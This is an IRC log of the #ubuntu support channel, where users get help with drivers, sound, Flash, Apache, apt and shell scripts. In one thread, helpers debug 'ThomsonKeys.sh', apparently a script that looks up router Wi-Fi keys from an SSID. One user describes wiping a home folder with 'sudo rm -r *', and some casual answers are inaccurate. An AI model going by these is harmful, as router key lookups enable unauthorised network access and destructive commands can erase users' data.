=== [SW]Dodge is now known as [SW]Dodge`oFF
bagelswell can i get the drivers and direct my linux box to go find them?16:43
tahhithat's why they made a package with driver-downloader with its installer in it.16:44
bagelsyou know, locally?16:44
tahhib43-fwcutter will download the drivers from openwrt's server.16:44
DarkStar1shayaknyc: Can't be done as far as I know since. An account needs to be active on any *nix/Linux machine for any services to be rendered16:44
shayaknycso then how do servers do this?16:45
DarkStar1shayaknyc: for security purposes and for logging purposed16:45
DarkStar1shayaknyc: All servers have only one account!16:45
tahhibagels, Plus if you have no internet connection, why even used Ubuntu?16:45
bagelstahhi, there are people who have done it completely offline before, but I'm having trouble figuring out how they did it.  There's stuff in the forums, but I can't decipher it16:45
HandyGandyHay when I run a part of the apt stack I often get error "E: Could not open file /var/lib/apt/  open 2 ( no such file or directory )" any one know how to clear it up?16:46
DarkStar1shayaknyc: monitored by the admin person responsible for it16:46
tahhiLinux and networking cannot be separated....16:46
bagelsugh, nevermind.16:46
tahhido you "only" jhave wireless?16:46
tahhido you "only" have wireless?16:46
DarkStar1tahhi: they can. It's just that if you need to do something useful you need networking16:46
DarkStar1tahhi: :)16:47
overriderwhat is a good tool that enables me to shut down unneeded services, eg. prevent them from starting? Thanks16:47
bagelsit's not my internet, it's someone else's, and he lets me on it tahhi16:47
=== resqul is now known as ResQu1
DarkStar1overrider: you can do that yourself16:47
tahhidoesn't the target PC have a regular ethernet?16:47
bagelsno. tahhi, the target PC only has wireless, as does this because I'm dual booting and I only have wireless ATM16:48
tahhiI've never heard of a pc with just wireless...16:48
DarkStar1overrider: Assuming you're in Lucid using gnome go to preferences->Startup Applications16:48
overriderDarkStar1: you mean in /etc/default and so on?16:48
bagelstahhi, that's not the point.16:48
overriderDarkStar1: ah excellent, thanks16:48
tahhithen how about you get a regular ethernet on that machine too.16:49
bagelsI can't, and don't feel like explaining that.16:49
tahhithat'll be easiest, afterall.16:49
DarkStar1overrider: Or you can manually stop the services you don't need, save the session and make it your defualt session for logging on16:49
bagelsi know it'd be easiest, if i plugged in, i wouldn't be here asking.16:49
Usbtastichi, is there a rss feed for ubuntu updates?16:49
overriderDarkStar1: well i need to disable cups i think, because running top shows a process called backend using 100% of cpu, rebooting does not help. man backend says it has to do with cups.16:50
overriderDarkStar1: ok thank you16:50
dolly56i have a problem if i at the  mixer my soundcard to 5.1 configure have i no bass16:50
bagelsi don't need to feel stupid, I want to know how to solve my problem.  if you don't know, just say so, don't tell me to get ethernet :(16:50
tahhibagels, okay, nock yourself...16:50
jpdsUsbtastic: http://blogs.ubuntu-nl.org/dennis/2010/04/30/ubuntu-changes-rss-feeds/16:50
DarkStar1overrider: Isn't cups a printer service?16:51
overriderDarkStar1: yes16:51
dolly56i have a problem if i at the mixer my soundcard to 5.1 configure have i no bass16:51
fbxxklEvanDonovan , RichardLynch:  Thanks for the input now I have to take that information and work on it!  Take care16:51
tahhiCUPS = Common Unis Printing System16:51
bagelstahhi: ???16:51
dolly56can everybody helps me16:51
DarkStar1overrider: Are you sure no one is accessing it over the network? because it shouldn't even be anywhere near 10%16:51
tahhiDarkStar1, CUPS = Common Unix Printing System16:52
Usbtasticjpds: thank you!16:52
dolly56can everybody helps me16:52
Pici!patience | dolly5616:52
ubottudolly56: Don't feel ignored and repeat your question quickly; if nobody knows your answer, nobody will answer you. You can search https://help.ubuntu.com or http://ubuntuforums.org while you wait.16:52
DarkStar1tahhi: I remember now:) It's just I never use it so it takes a while for these things to come back :)16:52
overriderDarkStar1: yes i am the only one here. Its full 100% all the time; i think its trying to talk to my network printer somehow; if i can figure out how to disable cups completely (if thats possible), that will do...16:52
dolly56i have a problem if i at the mixer my soundcard to 5.1 configure have i no bass16:53
skarhi, cron isn't starting automatically on my machine with lucid for server amd64. anyone know a fix?16:53
tahhiDarkStar1, oh well, it's now owned by Apple, FYI.16:53
dolly56 if i at the mixer my soundcard to 5.1 configure have i no bass16:53
DarkStar1overrider: I hope I remember this correctly but: <sudo /etc/init.re/<service stop> should do it16:54
DarkStar1tahhi: When did that happen?16:54
tahhiA while ago...16:54
overriderDarkStar1: yup, thanks!16:54
belisariusHi again16:54
dolly56i have a problem if i at the mixer my soundcard to 5.1 configure have i no bass16:55
craigbass1976I've just set up apache, and can't remember how to stop the "It works" page.  THought it was an /etc/apache2/sites-enabled but what I see there isn't making sense16:55
dolly56i have a problem if i at the mixer my soundcard to 5.1 configure have i no bass16:55
DarkStar1tahhi: MAn!! that sucks... Apple are now fast becoming the new Microsoft... Only difference is their sh#t works better16:55
bludshow can i do a replace using be that is word sensitive?16:55
tahhiDarkStar1, http://www.cups.org/articles.php?L47516:55
Picicraigbass1976: Why doesn't it make sense?16:55
dolly56i have a problem if i at the mixer my soundcard to 5.1 configure have i no bass16:56
tahhiI bet Apple will one day buy M$.16:56
belisariusGot Ubuntu to start properly now, but now I struggle with the next problems. My sound card audigy 2 zs is recognised, but I get no sound, though the onboard chip is disabled in bios and changed the alsamixer settings in the terminal.16:56
craigbass1976Pici, it looks like it's already pointed at /var/www, which is full of stuff16:56
Picicraigbass1976: Okay. And The 'it works' page isn't among that stuff?16:57
bludshow can i do a replace using vi** that is word sensitive?16:57
tahhiwhen that happens, it's gonna be Apple vs Linux! It's gonna be fuuuuuuun!!!16:57
DarkStar1tahhi: nahhh... why would they?16:58
ubottu#ubuntu is the Ubuntu support channel, for all Ubuntu-related support questions. Please use #ubuntu-offtopic for other topics. Thanks!16:58
craigbass1976Pici, index.html, but I renamed it.  Wait...  I just deleted it and am fine.  Firefox seems funny lately about caching stuff; perhaps that was the problem too16:58
belisariusno one got a hint for me?16:58
DarkStar1dolly56: Is someone helping you with your problem?16:59
tahhiDarkStar1, they can then organize a product line to encourage Windows user to MacOS.16:59
DarkStar1dolly56: can you fully explain to me and I'll see if I can help16:59
tahhiDarkStar1, they can then organize a product line to encourage Windows user to migrate to MacOS.17:00
DarkStar1tahhi: they don't need to17:00
tahhibut they'd live to!17:00
tahhilove to*17:00
mawstAnyone know what might cause gpg -d to dump garbage to screen?17:00
scyxhi, is it possible to migrate the printer configs from a karmic to a lucid install?17:00
tahhishould be.17:00
DarkStar1tahhi: they're already using their peripheral product line to slowly sneak MacOS through the back door17:00
Picitahhi, DarkStar1: #ubuntu is not a discussion channel.  Please stick to support questions/answers or chat elsewhere, such as #ubuntu-offtopic.17:00
dolly56DarkStar1: my problem is i have 5.1 sourond boxes and wehn i go to the mixxer and it on 5.1 configure than i have no bass17:01
RoastedQuestion - I know basic html web design. Is there any way I can customize the default apache web page layout?17:02
kevin_how can I get flash to work on a 64 bit? I tried using the software center but it still doesnt work17:02
jobmancan i change the stores that work with Rhythmbox17:02
jobmanbecause the ones that are in there, suck17:02
DarkStar1kevin_: Download it from Adobe. Works for me17:02
DarkStar1dolly56: What system are you using?17:02
mawstnm got it17:02
=== chriisti is now known as Chriisti
kevin_DarkStar1, http://labs.adobe.com/technologies/flashplayer10/64bit.html read17:03
dolly56the newest ubuntu version17:03
dolly5610.04 is it i think17:03
Izinucskevin_: if you've used the software center and searched for flash you may have inadvertantly installed a couple of different flash programs like gnash and flashplugin-nonfree.. if that's the case uninstall gnash and others leaving flashplugin-nonfree.. then restart firefox or whatever you're using.17:03
DarkStar1kevin_: Ooww......... you're screwed :D17:03
DarkStar1dolly56: 32/64 bit?17:04
kevin_Izinucs, the only one I installed was "Adobe Flash plugin" "Installer for the Adobe Flash Player plugin for Mozilla"17:04
Izinucskevin_: then also install flashplugin-nonfree or similar name as well17:04
kevin_sigh, guess I'll just have to install linux mint as it brings flash by default. Did not want to do that....any way I can get the 64bit flash file from somewhere other than adobe?17:05
Izinucskevin_: it's in the repos.. no need to get it from adobe.. no need to install mint17:05
Pici!hi | belisarius17:06
ubottubelisarius: Hi! Welcome to #ubuntu! Feel free to ask questions and help people out. The channel guidelines are at https://wiki.ubuntu.com/IRC/Guidelines . Enjoy your stay!17:06
kevin_I installed nonfree...let me try17:06
belisariusGot Ubuntu to start properly now, but now I struggle with the next problems. My sound card audigy 2 zs is recognised, but I get no sound, though the onboard chip is disabled in bios and changed the alsamixer settings in the terminal.17:06
DarkStar1dolly56: I'll be honest with you. I don't know much about sound problems in Lucid but I did have some troubles with sound lately. My solution was to keep alternating between the different listed hardware in the sound preferences until I foundthe hardware that was best compatible with my sound card17:06
sugarmiceI've just installed a Lucid machine using FAI or the first time, and the principle problem I have is that gdm isn't working properly at all.  How is gdm configured these days?  I'm used to how it works on Debian Lenny, but things are very different in Ubuntu Lucid17:07
kevin_ty ty it worked with nonfree flash plugin17:07
sugarmiceThe main problem I have is that there's no list of users presented, and also no way to enter one manually17:07
Izinucssugarmice: you referring to resolution?17:07
dolly56mhm ok thanks for the help17:07
Izinucssugarmice: on boot.. you don't get the login screen asking for user name pass?17:08
sugarmiceNo- the X server has started fine, at the right resolution, but I can't log in because there's no way to enter a user ID17:08
XentMornin everyone, I have a question.  I just installed Lucid Lynx, and on every other install I have ever made I have had a wireless bar on the top panel, after activating my wireless card.  But this time it is not there and I have had trouble getting my wireless to connect through terminal.17:08
XentAny advice?17:08
phox_Hi! This question is kinda hardware-related, but it's for a ubuntu-related problem so ill shoot. On my laptop, i have a bright yellow contact that you can use to connect the laptop to a tv-screen. What is that connection called? S-video?17:08
DarkStar1dolly56: try it and let me know. I couldn't figure out why my sound was working for most apps except for skype. so I kept tampering with the settings and got lucky :D17:09
sugarmiceI get what looks like a login screen (it has an icon of a computer, and the computer's DNS name, and the accessibility menu and shutdown/reboot are present at bottom right.17:09
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phox_josephnexus: were you talking to me?17:09
dolly56joa i do that17:09
RoastedQuestion - I know basic html web design. Is there any way I can customize the default apache web page layout?17:09
phox_josephnexus: nope i dont think that it's called RCA, that's for sound isnt it?17:10
sugarmiceIzinucs:  I think the problem may be something to do with the way we have authentication configured here.  We use LDAP; there are no local users configured at all (other than the system ones)17:10
DarkStar1phox_: What's the laptop model I can look it up to see what kind of connection you're talking about17:10
josephnexusphox_ :usually it refers to the 3 cables, left, right, video17:10
sugarmiceIzinucs:  But since there's no gdm.conf file any more, I have no idea where to look for configuration options17:11
Izinucs!ldap | sugarmice17:11
ubottusugarmice: LDAP is the Lightweight Directory Access Protocol. For more information, installation instructions and getting clients to authenticate via LDAP see https://help.ubuntu.com/community/OpenLDAPServer17:11
sugarmiceIzinucs:  Logging in at the text console is working fine17:11
phox_darkstar1: well the thing is i dont have it here, but it's like 1 year old fujitsu-siemens17:11
sugarmiceSo we know we've got the PAM configuration correct.17:11
DarkStar1phox_: surely the model number is scribbled on the laptop somewhere17:11
Izinucssugarmice: not sure if that link will help.. I don't know much about authenticating to an ldap server17:11
ainsophi have a question17:11
phox_josephnexus: okey. But i has like several connectors on it, not just a big hole like the rca-cabel17:11
Piciainsoph: don't ask to ask, just ask. (on one line please)17:12
phox_darkstar1: ill try and find a picture of the connector17:12
ainsophlet's say i have a .tar.gz program i want to install17:12
josephnexusthen that would be s-video phox_17:12
ainsophthe program says to install it all you have to do is type /mk when you are in the directory it is extracted to in the terminal17:12
phox_josephnexus: okey i think so too17:12
cwestHow to convert .rpm?17:12
ainsophso i can do that and run it but i have to be in the directory and type ./programname17:12
ainsophis there a way to install it so i can be in any directory and invoke the program17:13
ainsophfrom the terminal17:13
ainsophthe program is sbagen17:13
DarkStar1phox_: if it looks like this: http://img184.imageshack.us/f/svideodx0.gif/17:13
DarkStar1phox_: then it's s-video17:13
Pici!alien | cwest17:13
ubottucwest: RPM is the RedHat Package Management system. Ubuntu uses !APT, not RPM. RPM packages are not supported (the package "alien" can allow installing them, but it's quite dangerous and unsupported)17:13
phox_darkstar1: yeah looks something like that :)17:13
cwestThanks ubottu17:14
DarkStar1phox_: glad to be of help17:14
phox_darkstar1: im thinking about hooking my laptop up to my old tv, so should i just get a s-video to s-video cable? Or what is it called? Tv-out cable?17:14
Piciainsoph: Either drop the application itself, or a symlink to the executable into somewhere in your $PATH17:14
GibbyAnyone have dual screens working with Nouveau and a Nvidia card?17:14
ainsophwhat does drop mean?17:15
Piciainsoph: copy/move17:15
ainsophwhere would i move it to17:15
ainsophis there a special directory17:15
Piciainsoph: sudo ln -s /path/to/executable /usr/local/bin/17:16
* sapersi takes the L, passes to ainsoph, believes it will help17:16
DarkStar1phox_: If your TV has S-video then yes but you want to get like an s-video to the three headed(rca?)/scart type17:17
DJ_HaMsTaI am in a folder with a ton of mp3 files, i would like to highlight a good percentage (not all) so i can drag and drop to the media player, how can i do this?17:17
phox_darkstar1: hm okey ill look into that17:17
ScoobyDooI'm thinking of updating to the latest version of Ubuntu, I'm sure it won't but if I update will this remove any of my personal files?17:17
DarkStar1Gibby: what's nouveau?17:17
GibbyDarkStar1, Open Source nvidia card17:17
DarkStar1ScoobyDoo: No17:17
Strangeonedriver ^^17:17
trismDJ_HaMsTa: click on the first one, scroll down a bit and shift-click another one17:17
DJ_HaMsTaEvery time i try to highlight by clicking and holding the mouse it only selects 1 file .17:17
ScoobyDooDarkStar1: No it won't remove any of my files?17:18
DarkStar1Gibby: Well I got my dual screens running in Lucid but I use the nVdia PPa17:18
DJ_HaMsTatrism, that works thanks. Is there a way to do it the way its done in windows ?17:18
trismDJ_HaMsTa: I don't know, that's how I do it in windows too17:18
GibbyDarkStar1, I have problems with the nvidia drivers all the time. Nouveau works on 2 others with dual screens but not this one.17:19
* ScoobyDoo Is off to update to the latest version of Ubuntu, Yuupppeee!!!17:19
=== ogra__ is now known as ogra
ainsophthank you Pici and sapersi17:19
dolly56i have fix my problem17:20
Strangeoneare ATI grafik card also supported as well as nvidia?17:20
BluesKajphox_, if your tv has s-video and your graphics card has s-video out (and you're in north america or japan) then go for it , in europe you'll need a scart type connection at both tv and video out17:20
DarkStar1Gibby: The open source one had way too many problems for me but I did get dual screen working on it. but the little problems annoyed me17:20
dolly56my boxxes work now17:20
trismDJ_HaMsTa: although if you're in icon mode, you could click on the whitespace around the icons and drag a selection rectangle to select files too17:20
DarkStar1dolly56: Gratz. How did you?17:20
jhamboIs it possible to get korganizer to show the full event titles in the calendar?? it's not very usefull to look at a calender with lots of entries like "10:55 pm Meet..." and "8:00 am submit..."!17:21
belisariusI try it again. I'm using ubuntu 10.4 and it's recognising my soundcard audigy 2 zs properly, but I don't have sound. I disabled the onboard sound chip in bios and changed the settings in the alsamixer according to this post: http://ubuntuforums.org/showthread.php?t=194203 Though, I still have no sound. Anyone has an idea what's the cause or can tell me what further infos you need to help?17:21
GibbyDarkStar1, which nvidia card are you using and which nvidia binary drivers?17:22
DarkStar1Gibby: I use an OC 8800GT17:22
dolly56at that link you can read it but it is german can everybody put it into the wiki of ubuntu? http://www.nanokultur.de/2009/12/x-fi-extreme-gamer-extreme-music-unter-ubuntu-9-10-mit-bass-subwoofer-output/17:22
luisthow can i download the file that is responsible for a realtime streaming? cache got a swf but it wont open just by itself... this is the code that embeds it in the website: http://pastie.org/100403317:23
DarkStar1Gibby: with the latest drivers from the nVidia ppa17:23
GibbyDarkStar1, I am going to give it a shot since I can not find any support for nouveau, and it won't let me chat in the IRC for them for some reason17:23
BluesKajdolly56, try #ubuntu-de with that message17:24
DarkStar1Gibby hang on I'll give you the link17:24
crumplehola.  Does anyone know how to convert openssl certs to something gnu-tls is happy with?  can't seem to find the documentation and having some pain getting openldap to talk tls.17:25
antivirtelhello all, I have a problem with apt-cacher on lucid, in karmic it worked fine :), this: $ sudo apt-cacher --- /usr/sbin/apt-cacher: Fatal: Unable to open /var/log/apt-cacher/error.log, Access Denied17:25
GibbyDarkStar1, I saw it earlier just didn't bookmark it17:25
DarkStar1Gibby: https://launchpad.net/~nvidia-vdpau/+archive/ppa17:25
needsomehelpI have a .sql3 file and this script > http://pastebin.com/X2jD8rmG  How can I use it?17:25
dolly56wht dvd programm is good like  kaffeine because i dont want to use kaffeine because i have gnome not kde17:26
DarkStar1dolly56: I haven't met anything VLC can't tackle yet17:26
BluesKajantivirtel, it's apt-cache not apt cacher17:26
dolly56mhm ok17:26
needsomehelpI have a .sql3 file and this script > http://pastebin.com/X2jD8rmG  How can I use it?17:27
antivirtelBluesKaj: https://help.ubuntu.com/community/Apt-Cacher-Server17:27
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antivirtelwhy not?!17:27
* DarkStar1 going to watch "Sci-Fi Science: Physics of the Impossible - How to blow up a planet"17:27
oCean_DarkStar1: no need to share that in this channel.17:28
solidsnackneedsomehelp: What is this script supposed to do?17:29
belisariushonestly, it isn't fun to wait half an hour for a response. I'm off, maybe later.17:29
DarkStar1oCean_: cue swat eam eh? :)17:29
solidsnackThe line `echo Rede \| Pass' makes no sense.17:29
DarkStar1oCean_: team*17:29
needsomehelpsolidsnack: check the database file17:30
antivirtelhello all, I have a problem with apt-cacher on lucid, in karmic it worked fine :), this: $ sudo apt-cacher --- /usr/sbin/apt-cacher: Fatal: Unable to open /var/log/apt-cacher/error.log, Access Denied17:31
* salil neighs like a horse17:31
JackStonerantivirtel, try and check the file17:31
solidsnackneedsomehelp: You need to make a directory that has the `.sql3' file and the script in it.17:31
JackStoneruse sudo17:31
solidsnackneedsomehelp: Then `cd' to the directory and run the script.17:31
needsomehelpsolidsnack: they are in the same dir17:31
needsomehelpsolidsnack: I tried sh file.sh17:32
solidsnackneedsomehelp: and then...?17:32
ribothey guys..i hve this problem that my motd changes automatically... any ideas?17:32
nullp0inter.so when my ftp user tries to create a directory they get denied even in their home dir....i used chown -R importclient:ftp /path/to/home/dir when i first set it up17:32
LJRuffDoes Network manager look in a specific directory for CA certificates for WPA2?17:33
salilHow do you ask network manager to look for modems that were present from boot time?17:34
salilIt does detect modems.. But not if they were plugged in before nm came up..17:34
gineksiema, zna sie ktos na kompach od strony technicznej ?17:35
BluesKajLJRuff , I think NM looks at the essid on the router and how the encyption options are setup there17:35
corin_ribot, touch /etc/motd.static; rm /etc/motd; ln -s /etc/motd.static /etc/motd # edit /etc/motd.static17:35
oCean_!pl | ginek17:35
ubottuginek: Na tym kanale używamy tylko języka angielskiego. Możesz uzyskać pomoc w języku polskim na #ubuntu-pl.17:35
needsomehelpsolidsnack: http://pastebin.com/iw8mKrea17:35
salilWhat's that language btw17:35
corin_looks polish17:35
needsomehelp.pl = poland17:36
LJRuffBluesKaj, thanks17:36
corin_heh, didnt even see the !pl line17:36
salilsaliola: you kidding me?17:36
IdleOneCan anybody explain to me why winff is able to play a video file and vlc can't?17:37
BluesKajcorin_, I think that was czek17:37
corin_BluesKaj, google translate confirms my guess17:38
diana1480my cdrom drive just never mounts properly and if I run mount /media/cdrom0 the light never comes on and after about 20 seconds I get mount: no medium found on /dev/sr017:38
ribotty corin_17:38
BluesKajok corin_ ,no atience there anyway :)17:38
saliolasalil: ?17:38
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salilWhere does network manager store it's settings?17:40
solidsnackneedsomehelp: Replace `[[' with `['.17:40
gryzorHi. Simple question : does 10.04 support encrypted disk installation (with luks) by default ?17:40
solidsnackneedsomehelp: The use of `[[ <condition> ]]' for tests is a Bashism.17:40
solidsnackneedsomehelp: But this is a Bourne Shell script.17:41
jpdssalil: /.gconf/system/networking/connections17:41
Dinesh_Babuhey ppl..17:41
needsomehelpsolidsnack: im gonna install sqlite317:41
solidsnackneedsomehelp: Yes, you will need that, too.17:41
BluesKajsalil, in NM manage connections afaik , that' s where I edit mine17:41
=== fatality is now known as Guest97451
geirhaneedsomehelp: what does the first line of the script say?17:42
steebohi new to ubuntu. installed 10.4 lucid lynx. have win network setup already. setup shared folders on ubuntu. cant see ubuntu files on network and cant see network on ubuntu machine. help is appreciated17:42
salilI basically need a way to tell nm that my modem /dev/ttyACM0 already exists in the system and it should find it.. It will only find and connect to it if i plug it when NM is alive..17:42
needsomehelpbah same error17:43
geirhaneedsomehelp: I'm guessing it says #!/bin/bash, which means you musn't run it with sh.   chmod +x ThomsonKeys.sh; ./ThomsonKeys.sh17:43
WalterNok, I'm looking into building a new computer... which brings me to the classic question, ATI vs nvidia for driver support17:43
martin__Anyone got wpa wireless working on Lucid ?17:44
oCean_needsomehelp: what error?17:44
needsomehelp./ThomsonKeys.sh: 18: [[: not found17:45
* Abhishek_SIngh hello17:45
BluesKajsalil, are being asked for a pw after you've fifnished logging in ? , if so it could be nm asking for permission, i get that on lucid17:45
martin__I get an Authentication time out when I try to connect to my WPA secured network17:45
geirhaneedsomehelp: Is it your script?17:46
oCean_needsomehelp: the script will only *do* something when you specify first parameter.17:46
Guest97451do you know how can i install backtrack packets to ubuntu??17:46
Guest97451can you help me17:46
salilBluesKaj: Nope.. Not that.. I want to automate some nm stuff.. Never mind..17:46
geirhaneedsomehelp: Whoever wrote it didn't know what they were doing. It's probably a bash script.  bash ./ThomsonKeys.sh17:46
needsomehelpoCean_: what is the first parameter lol17:46
oCean_needsomehelp: the [[ ]] is a test, but failing, cause there's no $1 specified17:46
IdleOneWhat does does winff use to play/preview video (xvid) and why doesn't vlc play it?17:47
geirhaoCean_: No, because the hash-bang says #!/bin/sh17:47
BluesKajmartin__, are you being asked for authorization / permission after login is done?17:47
oCean_geirha: yeah, so?17:47
oCean_needsomehelp: do you even know what the script basically should do?17:47
geirhaoCean_: [[ is a bash-keyword. sh doesn't have it.17:48
oCean_needsomehelp: it searches for a SSID like the one specified as $117:48
needsomehelpoCean_: find a key from the sql3 database if a SSID given17:48
jmichaelxis there a channel for xorg-edgers?17:48
needsomehelpyeah I need to give the SSID17:48
oCean_needsomehelp: yes, so your first parameter would be something of a SSID17:48
needsomehelpdont know how17:48
oCean_needsomehelp: ./script 1234517:49
BluesKajIdleOne, you need the xvid / divx plugin for vlc17:49
martin__thanks BluesKaj .... it seems to just time-out and ask for my passphrase again17:49
martin__But I have other machines that can connect so I know the passphrase and the network config is OK17:49
oCean_needsomehelp: however, geirha is correct about the 'test' syntax. In /bin/sh it's not in double brackets17:50
IdleOneBluesKaj: where do I get it? third party source?17:50
geirhaoCean_: Whoever wrote it probably has /bin/sh symlinked to bash. Typical bashism.17:50
oCean_geirha: yup!17:51
Anarchoschnitzelhi there17:51
needsomehelpso HOw can I fix that script17:51
Joss_Someone can help me ?17:51
oCean_needsomehelp: change first line from /bin/sh to /bin/bash17:51
geirhaneedsomehelp: Change the first line from #!/bin/sh to #!/bin/bash17:51
martin__looks like this bug describes it "https://bugs.launchpad.net/ubuntu/+source/bcmwl/+bug/572777"  but the fix suggested on post #35 looks promising but doesn't seem to work17:52
konraddohi i need to convert PDF file to *.png or other image file format, is there any free linux program to do it? please help17:52
bastid_raZorGuest97451: get the .deb files and you can install them in ubuntu17:52
CaptainTrekJoss_:  just ask your question into here17:52
BluesKajIdleOne, yeah, think you need to enable all 3rd party sources , the plugin avifile-xvid-plugin , should work17:53
needsomehelpoCean_ geirha now it shows ./ThomsonKeys.sh: line 14: sqlite: command not found17:53
needsomehelpsqlite missing?17:53
VigoGuest97451: Get any help on Backtrack?17:53
geirhaneedsomehelp: Sounds like it. sudo aptitude install sqlite17:53
moesI have two distro,s on hard drive at sdb1 and sdb6...Need command to find name of which distro is on sdb1 and sb617:53
llutzkonraddo: "convert file.pdf file png"  convert from package imagemagick17:53
needsomehelpoh installed sqlite317:53
IdleOneBluesKaj: thank you. installing avidemux and a few other packages right now17:53
konraddooh thank you very much :)17:54
thune3needsomehelp: the script requires an argument on the command line17:54
needsomehelpUnable to open database "ThomsonKeys.sql3": file is encrypted or is not a database17:54
llutzmoes: mount them, "cat /mntpoint/etc/issue" tells you17:54
dalicouild anyone help me, please. when i see movies from net on xubuntu are very slow what can i do? i already install flash17:55
HideMeany suggestions for an app to burn mp3's to CD (to be played in a stereo)?17:55
needsomehelpgeirha: sqilte installed now I run it and shows "Unable to open database "ThomsonKeys.sql3": file is encrypted or is not a database" lol..17:55
DeathspawnHideMe, brasero17:56
bastid_raZorHideMe: k3b with kubuntu-restricted-extras installed17:56
IdleOneBluesKaj: still not wanting to cooperate :/17:56
lindenle1Can anyone help me get global keyboard shortcuts to work in kde?17:56
xd  hello17:56
=== xd is now known as Guest57343
geirhaneedsomehelp: I don't know what the script is supposed to do, so can't really help you there. And I'm about to leave.17:56
Picineedsomehelp: the executable for sqlite3 is 'sqlite3', not sqlite.  Make sure that is what you are using to open the file.17:56
HideMeDeathspawn, I just tried Brasero, it doesn't like the *.mp3 format.17:56
Guest57343 能说中文么17:57
torrentuserhello. anyone know where gnomes "remote desktop viewer" stores it's configuration? it's not in /etc .. thx17:57
dalicouild anyone help me, please. when i see movies from net on xubuntu are very slow what can i do? i already install flash17:57
Pici!zh | Guest5734317:57
ubottuGuest57343: For Ubuntu help in Chinese 您可以访问中文频道: #ubuntu-cn 或者 #ubuntu-tw  或者 #ubuntu-hk17:57
DeathspawnHideMe, sudo apt-get ubuntu-restricted-extras17:57
bastid_raZorHideMe: ubuntu-restricted-extras is what you need17:57
HideMeok... brb17:57
BluesKajIdleOne, well, some video codec etensions are misnamed , it's happened to me in the past17:57
needsomehelpPici: yeah! the script is using sqlite17:58
IdleOneBluesKaj: this one is .avi17:58
needsomehelpnot sqlite317:58
daliand me?17:58
HideMeDeathspawn,  155MB of extras?17:58
BluesKajIdleOne, then you'll need the w32codecs17:58
jmichaelxhas anyone here tried to purge packages/configs from the xorg-edgers ppa, using 'ppa-purge'. it is not working here at all17:59
BluesKajor w64 as the case may be, IdleOne17:59
=== nathan is now known as Guest48898
daliwhat i need?18:00
needsomehelpSCRIPT WORKING thanks a lot18:00
DeathspawnHideMe, yea. https://help.ubuntu.com/community/RestrictedFormats/ < Read that and you will find out why you need it. And I forgot install after apt-get. =/18:00
HideMeDeathspawn, ok thanks18:00
=== bac` is now known as bac
dalicouild anyone help me, please. when i see movies from net on xubuntu are very slow what can i do? i already install flash?18:02
antivirtelWHO uses apt-cacher on lucid? I cant start it in lucid, but it worked in karmic....18:02
DeathspawnI think my touchpad off/on button is out of sync with Ubuntu... everytime I hit the button, it never turns on, but the image shows it is on in the corner. I have even tried unplugging my mouse and it doesn't work.18:03
_guitarman_anyone have boot issues with ubuntu 10.04 lucid on an hp mininote 110?  only the .21 kernel boots for me... the others just sit there and go no-where - blank screen18:03
moesllutz, cat /mntpoint/etc/issue..returns cat: no such file or directory18:03
enjalotthis bug is still unresolved in 10.4 http://ubuntuforums.org/showthread.php?t=1123473 and i can't find it reported18:03
diana1480my cdrom drive just never mounts properly and if I run mount /media/cdrom0 the light never comes on and after about 20 seconds I get mount: no medium found on /dev/sr018:03
Nixloz<antivirtel>, what do you mean "apt-cacher"? are you trying to use "apt-cache"?18:03
llutzmoes: replace /mntpoint with your actual one18:03
nvsbli'm trying to make a gtk.Button transparent, but show an image. Is this possible?18:04
izmittti have problem installing ubuntu on my laptop,isntallation screen disappear,i hink vga problem.hav can i fix that?18:04
antivirtel!info apt-cacher | Nixloz18:04
ubottuNixloz: apt-cacher (source: apt-cacher): Caching proxy for Debian package and source files. In component universe, is optional. Version 1.6.10ubuntu2 (lucid), package size 78 kB, installed size 316 kB18:04
theadminDoes anyone know which version of Python is the IDLE in repos for?18:04
antivirtel!info apt-cach18:05
ubottuPackage apt-cach does not exist in lucid18:05
dalicouild anyone help me, please. when i see movies from net on xubuntu are very slow what can i do? i already install flash18:05
antivirtel!info apt-cache18:05
ubottuPackage apt-cache does not exist in lucid18:05
antivirtelWHO uses apt-cacher on lucid? I cant start it in lucid, but it worked in karmic....18:06
pfifodali, is this all the time or only in fullscreen?18:06
diana1480!info apt-get18:06
ubottuPackage apt-get does not exist in lucid18:06
theadminantivirtel: Nearly everyone does use apt-cache and it works fine here18:06
theadmin!find apt-cache18:07
ubottuFound: apt-cacher, apt-cacher-ng18:07
ubottuapt-proxy is a program that acts as a local apt repository server for a LAN, only fetching from the internet when required. To set it up see https://help.ubuntu.com/community/AptProxy18:07
CaptainTrekwhat's with all the !triggers?18:07
theadmin!info apt-cacher-ng | BluesKaj18:07
ubottuBluesKaj: apt-cacher-ng (source: apt-cacher-ng): caching proxy server for software repositories. In component universe, is optional. Version 0.4.6-1 (lucid), package size 289 kB, installed size 780 kB18:07
lunavoraxHello there !18:07
theadminGreetings, lunavorax18:08
Nixlozhello lunavorax18:08
lunavoraxI've made a terrible mistake just a few minutes ago :(18:08
BluesKaj!info apt-cacher-ng | antivirtel18:08
dweezahruse clonezilla18:08
pfifoI dont like how gimp was removed from the standard install18:08
ubottuantivirtel: apt-cacher-ng (source: apt-cacher-ng): caching proxy server for software repositories. In component universe, is optional. Version 0.4.6-1 (lucid), package size 289 kB, installed size 780 kB18:08
lunavoraxI wanted to empty an SD card with "sudo rm -r *"18:08
lunavoraxBut I forgot to go into it18:08
lunavoraxSo I deleted my entire home folder18:08
erUSULpfifo: what you do not like on *how* it was removed ?18:08
antivirteltheadmin ... I have a karmic mashine near here, I set it up in 2 mins, please wait18:09
pfifoerUSUL, because now I have to install it18:09
dweezahrrunning Ubuntu Ultimate edition 64 bit, uname -m gives i686, but I have and amd x64 processor, anyone knows why?18:09
lunavoraxI don't know how to recover my files now18:09
theadminlunavorax: Well... Data recovery software is available18:09
ubottuTo rescue a broken system, boot the alternate install CD and select "Rescue a broken system"18:09
DeathspawnCan anyone help? I think my touchpad off/on button is out of sync with Ubuntu... everytime I hit the button, it never turns on, but the image shows it is on in the corner. I have even tried unplugging my mouse and it doesn't work.18:10
Nixloz<lunavorax>, sudo apt-get install testdisk18:10
DeathspawnI should add on, I tried the synclient TouchpadOff=0 and it didn't work either.18:10
chris|lunavorax, check out e2undel18:10
lunavoraxNixloz, chris|, which one ?18:11
Nixlozi don't konw e2undel, but it probably works fine as well18:12
=== Guest57343 is now known as xiaode
* hdon likes how Transmission bittorrent client maps Control+V to "Verify local data" which usually means interrupting your torrent for ten minutes while it doesn't do what you wanted to do, which was paste18:12
izmittti have problem installing ubuntu on my laptop,isntallation screen disappear,i hink vga problem.hav can i fix that?18:12
nvsblthanks guys18:12
nvsbli am registered already18:12
